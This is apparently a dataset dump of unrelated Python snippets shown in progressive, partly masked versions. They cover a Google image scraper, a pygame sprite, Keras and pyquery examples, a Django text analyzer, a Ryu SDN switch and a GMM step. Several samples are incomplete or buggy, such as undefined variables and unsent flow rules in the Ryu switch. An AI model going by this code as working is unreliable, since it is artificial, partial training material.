index
int64 0
10k
| blob_id
stringlengths 40
40
| step-1
stringlengths 13
984k
| step-2
stringlengths 6
1.23M
⌀ | step-3
stringlengths 15
1.34M
⌀ | step-4
stringlengths 30
1.34M
⌀ | step-5
stringlengths 64
1.2M
⌀ | step-ids
sequencelengths 1
5
|
---|---|---|---|---|---|---|---|
1,600 | fa02fb701b59728671a7e87147adaeb33422dcdb | <mask token>
| {'ivy': {'svm': ({'kernel': 'rbf', 'C': 10.0}, 0.03448275862068966,
0.03508771929824561), 'tuned_ensemble': ({'svm__C': 100000.0,
'rf__n_estimators': 101, 'cart__min_samples_leaf': 7,
'knn__n_neighbors': 2, 'rf__random_state': 1542, 'cart__max_depth': 33,
'cart__max_features': 0.3571428571428572, 'svm__kernel': 'sigmoid',
'rf__max_leaf_nodes': 2, 'rf__min_samples_split': 11,
'cart__random_state': 1542, 'nb__priors': None, 'knn__weights':
'uniform', 'rf__min_samples_leaf': 16, 'rf__max_features':
0.439795918367347, 'cart__min_samples_split': 18}, 0.2891566265060241,
0.34146341463414637), 'nb': ({'priors': None}, 0.3529411764705882,
0.3529411764705882), 'best_param_ensemble': ({}, 0.2891566265060241,
0.2988505747126437), 'rf': ({'min_samples_split': 17,
'min_samples_leaf': 1, 'n_estimators': 61, 'random_state': 1542,
'max_leaf_nodes': 46, 'max_features': 0.9448979591836735},
0.27083333333333337, 0.380952380952381), 'cart': ({'max_depth': 50,
'random_state': 1542, 'max_features': 0.19183673469387758,
'min_samples_split': 13, 'min_samples_leaf': 5}, 0.3119266055045872,
0.2105263157894737), 'knn': ({'n_neighbors': 8, 'weights': 'uniform'},
0.23529411764705882, 0.23749999999999996)}}
| {'ivy': {'svm': ({'kernel': 'rbf', 'C': 10.0}, 0.034482758620689662, 0.035087719298245612), 'tuned_ensemble': ({'svm__C': 100000.0, 'rf__n_estimators': 101, 'cart__min_samples_leaf': 7, 'knn__n_neighbors': 2, 'rf__random_state': 1542, 'cart__max_depth': 33, 'cart__max_features': 0.35714285714285721, 'svm__kernel': 'sigmoid', 'rf__max_leaf_nodes': 2, 'rf__min_samples_split': 11, 'cart__random_state': 1542, 'nb__priors': None, 'knn__weights': 'uniform', 'rf__min_samples_leaf': 16, 'rf__max_features': 0.43979591836734699, 'cart__min_samples_split': 18}, 0.28915662650602408, 0.34146341463414637), 'nb': ({'priors': None}, 0.3529411764705882, 0.3529411764705882), 'best_param_ensemble': ({}, 0.28915662650602408, 0.2988505747126437), 'rf': ({'min_samples_split': 17, 'min_samples_leaf': 1, 'n_estimators': 61, 'random_state': 1542, 'max_leaf_nodes': 46, 'max_features': 0.94489795918367347}, 0.27083333333333337, 0.38095238095238099), 'cart': ({'max_depth': 50, 'random_state': 1542, 'max_features': 0.19183673469387758, 'min_samples_split': 13, 'min_samples_leaf': 5}, 0.31192660550458717, 0.2105263157894737), 'knn': ({'n_neighbors': 8, 'weights': 'uniform'}, 0.23529411764705882, 0.23749999999999996)}} | null | null | [
0,
1,
2
] |
1,601 | 02ffdd1c03cc20883eddc691fc841022b4ff40fd | <mask token>
def download_images(links, name):
dir_name = name.replace(' ', '_')
if not os.path.isdir(dir_name):
os.mkdir(dir_name)
for i, img_link in enumerate(links):
img_path = os.path.join(dir_name, '{:06}.png'.format(i))
ulib.urlretrieve(img_link, img_path)
<mask token>
| <mask token>
def find_links(name):
name = name.replace(' ', '+')
url_str = (
'https://www.google.com/search?ei=1m7NWePfFYaGmQG51q7IBg&hl=en&q={}' +
'\\&tbm=isch&ved=0ahUKEwjjovnD7sjWAhUGQyYKHTmrC2kQuT0I7gEoAQ&start={}'
+
'\\&yv=2&vet=10ahUKEwjjovnD7sjWAhUGQyYKHTmrC2kQuT0I7gEoAQ.1m7NWePfFYaGmQG51q7IBg'
+ '\\.i&ijn=1&asearch=ichunk&async=_id:rg_s,_pms:s')
headers = {'User-Agent': 'Chrome/65.0.3325.162 Safari/537.36',
'Content-Type': 'application/json'}
url_str = url_str.format(name, 0)
print(url_str)
request = ulib.Request(url_str, None, headers)
json_str = ulib.urlopen(request).read()
json_str = json.loads(json_str)
soup = Bsoup(json_str[1][1], 'lxml')
soup_imgs = soup.find_all('img')
img_links = [img['src'] for img in soup_imgs]
return img_links
def download_images(links, name):
dir_name = name.replace(' ', '_')
if not os.path.isdir(dir_name):
os.mkdir(dir_name)
for i, img_link in enumerate(links):
img_path = os.path.join(dir_name, '{:06}.png'.format(i))
ulib.urlretrieve(img_link, img_path)
<mask token>
| <mask token>
def find_links(name):
name = name.replace(' ', '+')
url_str = (
'https://www.google.com/search?ei=1m7NWePfFYaGmQG51q7IBg&hl=en&q={}' +
'\\&tbm=isch&ved=0ahUKEwjjovnD7sjWAhUGQyYKHTmrC2kQuT0I7gEoAQ&start={}'
+
'\\&yv=2&vet=10ahUKEwjjovnD7sjWAhUGQyYKHTmrC2kQuT0I7gEoAQ.1m7NWePfFYaGmQG51q7IBg'
+ '\\.i&ijn=1&asearch=ichunk&async=_id:rg_s,_pms:s')
headers = {'User-Agent': 'Chrome/65.0.3325.162 Safari/537.36',
'Content-Type': 'application/json'}
url_str = url_str.format(name, 0)
print(url_str)
request = ulib.Request(url_str, None, headers)
json_str = ulib.urlopen(request).read()
json_str = json.loads(json_str)
soup = Bsoup(json_str[1][1], 'lxml')
soup_imgs = soup.find_all('img')
img_links = [img['src'] for img in soup_imgs]
return img_links
def download_images(links, name):
dir_name = name.replace(' ', '_')
if not os.path.isdir(dir_name):
os.mkdir(dir_name)
for i, img_link in enumerate(links):
img_path = os.path.join(dir_name, '{:06}.png'.format(i))
ulib.urlretrieve(img_link, img_path)
if __name__ == '__main__':
search_str = 'yoyo'
links = find_links(search_str)
download_images(links, search_str)
print('downloding images.... done!!!')
| import os
import urllib.request as ulib
import json
from bs4 import BeautifulSoup as Bsoup
def find_links(name):
name = name.replace(' ', '+')
url_str = (
'https://www.google.com/search?ei=1m7NWePfFYaGmQG51q7IBg&hl=en&q={}' +
'\\&tbm=isch&ved=0ahUKEwjjovnD7sjWAhUGQyYKHTmrC2kQuT0I7gEoAQ&start={}'
+
'\\&yv=2&vet=10ahUKEwjjovnD7sjWAhUGQyYKHTmrC2kQuT0I7gEoAQ.1m7NWePfFYaGmQG51q7IBg'
+ '\\.i&ijn=1&asearch=ichunk&async=_id:rg_s,_pms:s')
headers = {'User-Agent': 'Chrome/65.0.3325.162 Safari/537.36',
'Content-Type': 'application/json'}
url_str = url_str.format(name, 0)
print(url_str)
request = ulib.Request(url_str, None, headers)
json_str = ulib.urlopen(request).read()
json_str = json.loads(json_str)
soup = Bsoup(json_str[1][1], 'lxml')
soup_imgs = soup.find_all('img')
img_links = [img['src'] for img in soup_imgs]
return img_links
def download_images(links, name):
dir_name = name.replace(' ', '_')
if not os.path.isdir(dir_name):
os.mkdir(dir_name)
for i, img_link in enumerate(links):
img_path = os.path.join(dir_name, '{:06}.png'.format(i))
ulib.urlretrieve(img_link, img_path)
if __name__ == '__main__':
search_str = 'yoyo'
links = find_links(search_str)
download_images(links, search_str)
print('downloding images.... done!!!')
| import os
import urllib.request as ulib
import json
from bs4 import BeautifulSoup as Bsoup
def find_links(name):
name = name.replace(" ", "+")
url_str = 'https://www.google.com/search?ei=1m7NWePfFYaGmQG51q7IBg&hl=en&q={}' + \
'\&tbm=isch&ved=0ahUKEwjjovnD7sjWAhUGQyYKHTmrC2kQuT0I7gEoAQ&start={}' + \
'\&yv=2&vet=10ahUKEwjjovnD7sjWAhUGQyYKHTmrC2kQuT0I7gEoAQ.1m7NWePfFYaGmQG51q7IBg' + \
'\.i&ijn=1&asearch=ichunk&async=_id:rg_s,_pms:s'
headers = {"User-Agent": "Chrome/65.0.3325.162 Safari/537.36", "Content-Type": "application/json"}
url_str = url_str.format(name, 0)
print(url_str)
request = ulib.Request(url_str, None, headers)
json_str = ulib.urlopen(request).read()
json_str = json.loads(json_str)
soup = Bsoup(json_str[1][1], 'lxml')
soup_imgs = soup.find_all("img")
img_links = [img["src"] for img in soup_imgs]
return img_links
def download_images(links, name):
dir_name = name.replace(" ", "_")
if not os.path.isdir(dir_name):
os.mkdir(dir_name)
for i, img_link in enumerate(links):
img_path = os.path.join(dir_name, "{:06}.png".format(i))
ulib.urlretrieve(img_link, img_path)
if __name__ == "__main__":
search_str = "yoyo"
links = find_links(search_str)
download_images(links, search_str)
print("downloding images.... done!!!") | [
1,
2,
3,
4,
5
] |
1,602 | 290f96bb210a21183fe1e0e53219ad38ba889625 | <mask token>
| default_app_config = 'child.apps.ChildConfig'
| null | null | null | [
0,
1
] |
1,603 | d088aadc4d88267b908c4f6de2928c812ef36739 | <mask token>
class Bunker(Sprite):
<mask token>
<mask token>
def blitme(self):
"""Draw the ship at its current location"""
self.screen.blit(self.image, self.rect)
| <mask token>
class Bunker(Sprite):
def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):
"""Initialize the ship and set its starting position"""
super(Bunker, self).__init__()
self.screen = screen
self.images = images
self.image = self.images[18]
self.rect = self.image.get_rect()
self.screen_rect = screen.get_rect()
self.rect.centerx = bunker_x
self.rect.bottom = bunker_y
self.bunker_health = 5
<mask token>
def blitme(self):
"""Draw the ship at its current location"""
self.screen.blit(self.image, self.rect)
| <mask token>
class Bunker(Sprite):
def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):
"""Initialize the ship and set its starting position"""
super(Bunker, self).__init__()
self.screen = screen
self.images = images
self.image = self.images[18]
self.rect = self.image.get_rect()
self.screen_rect = screen.get_rect()
self.rect.centerx = bunker_x
self.rect.bottom = bunker_y
self.bunker_health = 5
def update(self):
"""Track the HP of the bunker"""
if self.bunker_health == 0:
self.kill()
def blitme(self):
"""Draw the ship at its current location"""
self.screen.blit(self.image, self.rect)
| import pygame
from pygame.sprite import Sprite
import spritesheet
class Bunker(Sprite):
def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):
"""Initialize the ship and set its starting position"""
super(Bunker, self).__init__()
self.screen = screen
self.images = images
self.image = self.images[18]
self.rect = self.image.get_rect()
self.screen_rect = screen.get_rect()
self.rect.centerx = bunker_x
self.rect.bottom = bunker_y
self.bunker_health = 5
def update(self):
"""Track the HP of the bunker"""
if self.bunker_health == 0:
self.kill()
def blitme(self):
"""Draw the ship at its current location"""
self.screen.blit(self.image, self.rect)
| import pygame
from pygame.sprite import Sprite
import spritesheet
class Bunker(Sprite):
def __init__(self, ai_settings, bunker_x, bunker_y, screen, images):
"""Initialize the ship and set its starting position"""
super(Bunker, self).__init__()
self.screen = screen
self.images = images
self.image = self.images[18]
self.rect = self.image.get_rect()
self.screen_rect = screen.get_rect()
# Start each new bunker at the bottom of the screen
self.rect.centerx = bunker_x
self.rect.bottom = bunker_y
# Store a decimal value for the ship's center.
#self.center = float(self.rect.centerx)
self.bunker_health = 5
def update(self):
"""Track the HP of the bunker"""
if self.bunker_health == 0:
self.kill()
def blitme(self):
"""Draw the ship at its current location"""
self.screen.blit(self.image, self.rect)
| [
2,
3,
4,
5,
6
] |
1,604 | 02ab822dacb26d623a474fa45ebb034f9c1291b8 | <mask token>
| <mask token>
print(a, type(a))
print(a.attr('href'))
print(a.attr.href)
| <mask token>
html = """
<div id="container">
<ul class="list">
<li class="item-0">first item</li>
<li class="item-1"><a href="link2.html">second item</a></li>
<li class="item-0 active"><a href="link3.html">third item</a></li>
<li class="item-1 active"><a href="link4.html">fourth item</a></li>
<li class="item-0"><a href="link5.html">fifth item</a></li>
</ul
</div>
"""
doc = pq(html)
a = doc('.item-0.active a')
print(a, type(a))
print(a.attr('href'))
print(a.attr.href)
| from pyquery import PyQuery as pq
html = """
<div id="container">
<ul class="list">
<li class="item-0">first item</li>
<li class="item-1"><a href="link2.html">second item</a></li>
<li class="item-0 active"><a href="link3.html">third item</a></li>
<li class="item-1 active"><a href="link4.html">fourth item</a></li>
<li class="item-0"><a href="link5.html">fifth item</a></li>
</ul
</div>
"""
doc = pq(html)
a = doc('.item-0.active a')
print(a, type(a))
print(a.attr('href'))
print(a.attr.href)
| # coding: utf-8
from pyquery import PyQuery as pq
html = '''
<div id="container">
<ul class="list">
<li class="item-0">first item</li>
<li class="item-1"><a href="link2.html">second item</a></li>
<li class="item-0 active"><a href="link3.html">third item</a></li>
<li class="item-1 active"><a href="link4.html">fourth item</a></li>
<li class="item-0"><a href="link5.html">fifth item</a></li>
</ul
</div>
'''
# 获取属性
# 第一种方法
doc = pq(html)
a = doc('.item-0.active a')
print(a, type(a))
print(a.attr('href'))
# 第二种方法
print(a.attr.href)
| [
0,
1,
2,
3,
4
] |
1,605 | f7afd08fb8316e44c314d17ef382b98dde7eef91 | <mask token>
| <mask token>
def jindutiao(jindu, zonge):
ret = jindu / zonge * 100
r = '\r%s%d%%' % ('=' * jindu, ret)
sys.stdout.write(r)
sys.stdout.flush()
<mask token>
| <mask token>
def jindutiao(jindu, zonge):
ret = jindu / zonge * 100
r = '\r%s%d%%' % ('=' * jindu, ret)
sys.stdout.write(r)
sys.stdout.flush()
if __name__ == '__main__':
for i in range(101):
time.sleep(0.1)
jindutiao(i, 100)
| import time
import sys
def jindutiao(jindu, zonge):
ret = jindu / zonge * 100
r = '\r%s%d%%' % ('=' * jindu, ret)
sys.stdout.write(r)
sys.stdout.flush()
if __name__ == '__main__':
for i in range(101):
time.sleep(0.1)
jindutiao(i, 100)
| #!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: Yuan
import time
import sys
def jindutiao(jindu,zonge):
ret = (jindu/zonge)*100
r = "\r%s%d%%"%("="*jindu,ret)
sys.stdout.write(r)
sys.stdout.flush()
if __name__ =="__main__":
for i in range(101):
time.sleep(0.1)
jindutiao(i,100)
| [
0,
1,
2,
3,
4
] |
1,606 | 7620ff333422d0354cc41c2a66444c3e8a0c011f | <mask token>
| <mask token>
class NameSearch(forms.Form):
<mask token>
| <mask token>
class NameSearch(forms.Form):
name = forms.CharField(label='Search By Name')
| from django import forms
from django.core import validators
class NameSearch(forms.Form):
name = forms.CharField(label='Search By Name')
| null | [
0,
1,
2,
3
] |
1,607 | 18b82f83d3bf729eadb2bd5a766f731a2c54a93b | <mask token>
| class Solution:
<mask token>
| class Solution:
def searchRange(self, nums: List[int], target: int) ->List[int]:
res = [-1, -1]
def binary_serach(left, right, target, res):
if left >= right:
return
mid = (left + right) // 2
if nums[mid] == target:
if res[0] == -1:
res[0] = res[1] = mid
else:
res[0] = min(res[0], mid)
res[1] = max(res[1], mid)
if nums[mid] > target:
binary_serach(left, mid, target, res)
elif nums[mid] < target:
binary_serach(mid + 1, right, target, res)
else:
binary_serach(left, mid, target, res)
binary_serach(mid + 1, right, target, res)
if nums:
binary_serach(0, len(nums), target, res)
return res
| null | null | [
0,
1,
2
] |
1,608 | 86d032a3cd67118eb46073c996f1c9a391f8dfe0 | <mask token>
class SimpleSwitch(app_manager.RyuApp):
<mask token>
<mask token>
<mask token>
print('PACKET_OUT...')
| <mask token>
class SimpleSwitch(app_manager.RyuApp):
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
<mask token>
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
return
if eth.ethertype == ether_types.ETH_TYPE_IPV6:
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',
dpid, src, dst, msg.in_port)
self.mac_to_port[dpid][src] = msg.in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
if out_port != ofproto.OFPP_FLOOD:
self.logger.info(
'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '
, dpid, src, dst, msg.in_port, out_port)
self.add_flow(datapath, msg.in_port, dst, src, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
print('PACKET_OUT...')
| <mask token>
class SimpleSwitch(app_manager.RyuApp):
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
def add_flow(self, datapath, in_port, dst, src, actions):
ofproto = datapath.ofproto
match = datapath.ofproto_parser.OFPMatch(in_port=in_port, dl_dst=
haddr_to_bin(dst), dl_src=haddr_to_bin(src))
mod = datapath.ofproto_parser.OFPFlowMod(datapath=datapath, match=
match, cookie=0, command=ofproto.OFPFC_ADD, idle_timeout=0,
hard_timeout=0, priority=ofproto.OFP_DEFAULT_PRIORITY, flags=
ofproto.OFPFF_SEND_FLOW_REM, actions=actions)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
return
if eth.ethertype == ether_types.ETH_TYPE_IPV6:
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',
dpid, src, dst, msg.in_port)
self.mac_to_port[dpid][src] = msg.in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
if out_port != ofproto.OFPP_FLOOD:
self.logger.info(
'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '
, dpid, src, dst, msg.in_port, out_port)
self.add_flow(datapath, msg.in_port, dst, src, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
print('PACKET_OUT...')
| from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_0
from ryu.lib.mac import haddr_to_bin
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ether_types
class SimpleSwitch(app_manager.RyuApp):
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
def add_flow(self, datapath, in_port, dst, src, actions):
ofproto = datapath.ofproto
match = datapath.ofproto_parser.OFPMatch(in_port=in_port, dl_dst=
haddr_to_bin(dst), dl_src=haddr_to_bin(src))
mod = datapath.ofproto_parser.OFPFlowMod(datapath=datapath, match=
match, cookie=0, command=ofproto.OFPFC_ADD, idle_timeout=0,
hard_timeout=0, priority=ofproto.OFP_DEFAULT_PRIORITY, flags=
ofproto.OFPFF_SEND_FLOW_REM, actions=actions)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
return
if eth.ethertype == ether_types.ETH_TYPE_IPV6:
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',
dpid, src, dst, msg.in_port)
self.mac_to_port[dpid][src] = msg.in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
if out_port != ofproto.OFPP_FLOOD:
self.logger.info(
'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '
, dpid, src, dst, msg.in_port, out_port)
self.add_flow(datapath, msg.in_port, dst, src, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
print('PACKET_OUT...')
| from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_0
from ryu.lib.mac import haddr_to_bin
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ether_types
class SimpleSwitch(app_manager.RyuApp):
# TODO define OpenFlow 1.0 version for the switch
# add your code here
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
def add_flow(self, datapath, in_port, dst, src, actions):
ofproto = datapath.ofproto
match = datapath.ofproto_parser.OFPMatch(
in_port=in_port,
dl_dst=haddr_to_bin(dst), dl_src=haddr_to_bin(src))
mod = datapath.ofproto_parser.OFPFlowMod(
datapath=datapath, match=match, cookie=0,
command=ofproto.OFPFC_ADD, idle_timeout=0, hard_timeout=0,
priority=ofproto.OFP_DEFAULT_PRIORITY,
flags=ofproto.OFPFF_SEND_FLOW_REM, actions=actions)
# TODO send modified message out
# add your code here
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
# ignore lldp packet
return
if eth.ethertype == ether_types.ETH_TYPE_IPV6:
# ignore ipv6 packet
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info("packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s", dpid, src, dst, msg.in_port)
# learn a mac address to avoid FLOOD next time.
self.mac_to_port[dpid][src] = msg.in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
# TODO define the action for output
# add your code here
# install a flow to avoid packet_in next time
if out_port != ofproto.OFPP_FLOOD:
self.logger.info("add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] ", dpid, src, dst, msg.in_port, out_port)
self.add_flow(datapath, msg.in_port, dst, src, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
# TODO define the OpenFlow Packet Out
# add your code here
print ("PACKET_OUT...")
| [
1,
3,
4,
5,
6
] |
1,609 | e9890fcf9ad2a78b3400f6e4eeb75deac8edcd6a | <mask token>
| <mask token>
if __name__ == '__main__':
sac_gym_test()
| from neodroidagent.entry_points.agent_tests import sac_gym_test
if __name__ == '__main__':
sac_gym_test()
| from neodroidagent.entry_points.agent_tests import sac_gym_test
if __name__ == "__main__":
sac_gym_test()
| null | [
0,
1,
2,
3
] |
1,610 | c8fecb6bfbd39e7a82294c9e0f9e5eaf659b7fed | <mask token>
| <mask token>
model.compile(optimizer='sgd', loss='mean_squared_error')
<mask token>
model.fit(xs, ys, epochs=500)
<mask token>
print(model.predict(dataIn, 1, 1))
| <mask token>
model = keras.Sequential([keras.layers.Dense(units=1, input_shape=[1])])
model.compile(optimizer='sgd', loss='mean_squared_error')
xs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float)
ys = np.array([-2.0, 1.0, 4.0, 7.0, 10.0, 13.0], dtype=float)
model.fit(xs, ys, epochs=500)
dataIn = np.array([10.0], dtype=float)
print(model.predict(dataIn, 1, 1))
| import numpy as np
import keras
model = keras.Sequential([keras.layers.Dense(units=1, input_shape=[1])])
model.compile(optimizer='sgd', loss='mean_squared_error')
xs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float)
ys = np.array([-2.0, 1.0, 4.0, 7.0, 10.0, 13.0], dtype=float)
model.fit(xs, ys, epochs=500)
dataIn = np.array([10.0], dtype=float)
print(model.predict(dataIn, 1, 1))
| # Exercise 1 - linear.py
import numpy as np
import keras
# Build the model
model = keras.Sequential([keras.layers.Dense(units=1,input_shape=[1])])
# Set the loss and optimizer function
model.compile(optimizer='sgd', loss='mean_squared_error')
# Initialize input data
xs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float)
ys = np.array([-2.0, 1.0, 4.0, 7.0, 10.0, 13.0], dtype=float)
# Fit the model
model.fit(xs, ys, epochs=500)
# Prediction
dataIn = np.array([10.0], dtype=float)
print(model.predict(dataIn,1,1)) | [
0,
1,
2,
3,
4
] |
1,611 | a55daebd85002640db5e08c2cf6d3e937b883f01 | <mask token>
| <mask token>
def maximization(X, g):
"""
Returns: pi, m, S, or None, None, None on failure
"""
if type(X) is not np.ndarray or len(X.shape) != 2:
return None, None, None
if type(g) is not np.ndarray or len(g.shape) != 2:
return None, None, None
n, d = X.shape
if n != g.shape[1]:
return None, None, None
k = g.shape[0]
probs = np.sum(g, axis=0)
validation = np.ones((n,))
if not np.isclose(probs, validation).all():
return None, None, None
pi = np.zeros((k,))
m = np.zeros((k, d))
S = np.zeros((k, d, d))
for i in range(k):
pi[i] = np.sum(g[i]) / n
m[i] = np.matmul(g[i], X) / np.sum(g[i])
S[i] = np.matmul(g[i] * (X - m[i]).T, X - m[i]) / np.sum(g[i])
return pi, m, S
| <mask token>
import numpy as np
def maximization(X, g):
"""
Returns: pi, m, S, or None, None, None on failure
"""
if type(X) is not np.ndarray or len(X.shape) != 2:
return None, None, None
if type(g) is not np.ndarray or len(g.shape) != 2:
return None, None, None
n, d = X.shape
if n != g.shape[1]:
return None, None, None
k = g.shape[0]
probs = np.sum(g, axis=0)
validation = np.ones((n,))
if not np.isclose(probs, validation).all():
return None, None, None
pi = np.zeros((k,))
m = np.zeros((k, d))
S = np.zeros((k, d, d))
for i in range(k):
pi[i] = np.sum(g[i]) / n
m[i] = np.matmul(g[i], X) / np.sum(g[i])
S[i] = np.matmul(g[i] * (X - m[i]).T, X - m[i]) / np.sum(g[i])
return pi, m, S
| #!/usr/bin/env python3
"""
Calculates the maximization step in the EM algorithm for a GMM
"""
import numpy as np
def maximization(X, g):
"""
Returns: pi, m, S, or None, None, None on failure
"""
if type(X) is not np.ndarray or len(X.shape) != 2:
return None, None, None
if type(g) is not np.ndarray or len(g.shape) != 2:
return None, None, None
n, d = X.shape
if n != g.shape[1]:
return None, None, None
k = g.shape[0]
# sum of gi equal to 1
probs = np.sum(g, axis=0)
validation = np.ones((n,))
if not np.isclose(probs, validation).all():
return None, None, None
pi = np.zeros((k,))
m = np.zeros((k, d))
S = np.zeros((k, d, d))
for i in range(k):
pi[i] = np.sum(g[i]) / n
m[i] = np.matmul(g[i], X) / np.sum(g[i])
S[i] = np.matmul(g[i] * (X - m[i]).T, X - m[i]) / np.sum(g[i])
return pi, m, S
| null | [
0,
1,
2,
3
] |
1,612 | 512d0a293b0cc3e6f7d84bb6958dc6693acde680 | <mask token>
def aboutme(request):
return HttpResponse(
" <a href='https://nb786.github.io/Ncoder/about.html' > Aboutme</a>")
<mask token>
def analyze(request):
djtext = request.POST.get('text', 'default')
removepunc = request.POST.get('removepunc', 'off')
fullcaps = request.POST.get('fullcaps', 'off')
newlineremover = request.POST.get('newlineremover', 'off')
extraspaceremover = request.POST.get('extraspaceremover', 'off')
charcount = request.POST.get('charcount', 'off')
print(removepunc)
if removepunc == 'on':
punctuations = '!()-[]{};:\'"\\,<>./?@#$%^&*_~'
analyzed = ''
for char in djtext:
if char not in punctuations:
analyzed = analyzed + char
dics = {'purpose': 'Removed Punctuations', 'analyzed_text':
analyzed}
djtext = analyzed
if fullcaps == 'on':
analyzed = ''
for char in djtext:
analyzed = analyzed + char.upper()
dics = {'purpose': 'Changed to Uppercase', 'analyzed_text': analyzed}
djtext = analyzed
if newlineremover == 'on':
analyzed = ''
for char in djtext:
if char != '\n' and char != '\r':
analyzed = analyzed + char
else:
print('no')
print('pre', analyzed)
dics = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}
djtext = analyzed
if extraspaceremover == 'on':
analyzed = ''
for index, char in enumerate(djtext):
if not (djtext[index] == '' and djtext[index + 1] == ''):
analyzed = analyzed + char
dics = {'purpose': 'Removed the Extra Spaces', 'analyzed_text':
analyzed}
djtext = analyzed
if charcount == 'on':
analyzed = ''
for char in djtext:
analyzed = len(djtext)
dics = {'purpose': 'Total no. of Character in your text are',
'analyzed_text': analyzed}
if (removepunc != 'on' and fullcaps != 'on' and newlineremover != 'on' and
extraspaceremover != 'on' and charcount != 'on'):
return HttpResponse('Please Select Any Function And Try Again!')
return render(request, 'analyze.html', dics)
| <mask token>
def index(request):
return render(request, 'index.html')
def aboutme(request):
return HttpResponse(
" <a href='https://nb786.github.io/Ncoder/about.html' > Aboutme</a>")
<mask token>
def analyze(request):
djtext = request.POST.get('text', 'default')
removepunc = request.POST.get('removepunc', 'off')
fullcaps = request.POST.get('fullcaps', 'off')
newlineremover = request.POST.get('newlineremover', 'off')
extraspaceremover = request.POST.get('extraspaceremover', 'off')
charcount = request.POST.get('charcount', 'off')
print(removepunc)
if removepunc == 'on':
punctuations = '!()-[]{};:\'"\\,<>./?@#$%^&*_~'
analyzed = ''
for char in djtext:
if char not in punctuations:
analyzed = analyzed + char
dics = {'purpose': 'Removed Punctuations', 'analyzed_text':
analyzed}
djtext = analyzed
if fullcaps == 'on':
analyzed = ''
for char in djtext:
analyzed = analyzed + char.upper()
dics = {'purpose': 'Changed to Uppercase', 'analyzed_text': analyzed}
djtext = analyzed
if newlineremover == 'on':
analyzed = ''
for char in djtext:
if char != '\n' and char != '\r':
analyzed = analyzed + char
else:
print('no')
print('pre', analyzed)
